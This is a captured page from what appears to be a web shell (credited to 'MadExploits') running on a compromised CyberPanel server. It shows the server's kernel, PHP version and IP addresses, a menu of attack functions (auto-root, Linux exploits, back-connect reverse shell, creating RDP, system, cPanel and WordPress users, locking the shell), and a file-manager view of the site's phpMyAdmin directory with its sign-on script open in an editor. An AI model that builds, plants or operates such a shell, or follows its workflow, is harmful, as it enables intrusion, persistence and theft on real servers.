Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
public /
phpmyadmin /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
setup
[ DIR ]
drwxr-xr-x
sql
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.rtlcssrc.json
20
B
-rw-r--r--
CONTRIBUTING.md
2.53
KB
-rw-r--r--
ChangeLog
69.34
KB
-rw-r--r--
LICENSE
17.67
KB
-rw-r--r--
README
1.48
KB
-rw-r--r--
RELEASE-DATE-5.2.1
29
B
-rw-r--r--
babel.config.json
69
B
-rw-r--r--
composer.json
5.2
KB
-rw-r--r--
composer.lock
298.68
KB
-rw-r--r--
config.inc.php
4.86
KB
-rw-r--r--
config.sample.inc.php
4.7
KB
-rw-r--r--
favicon.ico
21.96
KB
-rw-r--r--
index.php
1.05
KB
-rw-r--r--
package.json
2.72
KB
-rw-r--r--
phpmyadminsignin.php
2.08
KB
-rw-r--r--
robots.txt
26
B
-rw-r--r--
show_config_errors.php
1.13
KB
-rw-r--r--
url.php
965
B
-rw-r--r--
yarn.lock
247.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpmyadminsignin.php
<?php define("PMA_SIGNON_INDEX", 1); try { define('PMA_SIGNON_SESSIONNAME', 'SignonSession'); define('PMA_DISABLE_SSL_PEER_VALIDATION', TRUE); if (isset($_POST['token'])) { ### Get credentials using the token $token = htmlspecialchars($_POST['token'], ENT_QUOTES, 'UTF-8'); $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8'); //$url = "/dataBases/fetchDetailsPHPMYAdmin?token=" . $token . '&username=' . $username; $url = "/dataBases/fetchDetailsPHPMYAdmin"; // header('Location: ' . $url); // Redirect with POST data echo '<form id="redirectForm" action="' . $url . '" method="post">'; echo '<input type="hidden" value="' . $token . '" name="token">'; echo '<input type="hidden" value="' . $username . '" name="username">'; echo '</form>'; echo '<script>document.getElementById("redirectForm").submit();</script>'; } else if (isset($_POST['logout'])) { $params = session_get_cookie_params(); setcookie(session_name(), '', time() - 86400, $params["path"], $params["domain"], $params["secure"], $params["httponly"]); session_destroy(); header('Location: /base/'); return; } else if (isset($_POST['password'])) { session_name(PMA_SIGNON_SESSIONNAME); @session_start(); $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8'); $password = $_POST['password']; $_SESSION['PMA_single_signon_user'] = $username; $_SESSION['PMA_single_signon_password'] = $password; $_SESSION['PMA_single_signon_host'] = 'localhost'; @session_write_close(); header('Location: /phpmyadmin/index.php?server=' . PMA_SIGNON_INDEX); } } catch (Exception $e) { echo 'Caught exception: ', $e->getMessage(), "\n"; $params = session_get_cookie_params(); setcookie(session_name(), '', time() - 86400, $params["path"], $params["domain"], $params["secure"], $params["httponly"]); session_destroy(); header('Location: /dataBases/phpMyAdmin'); return; }
Close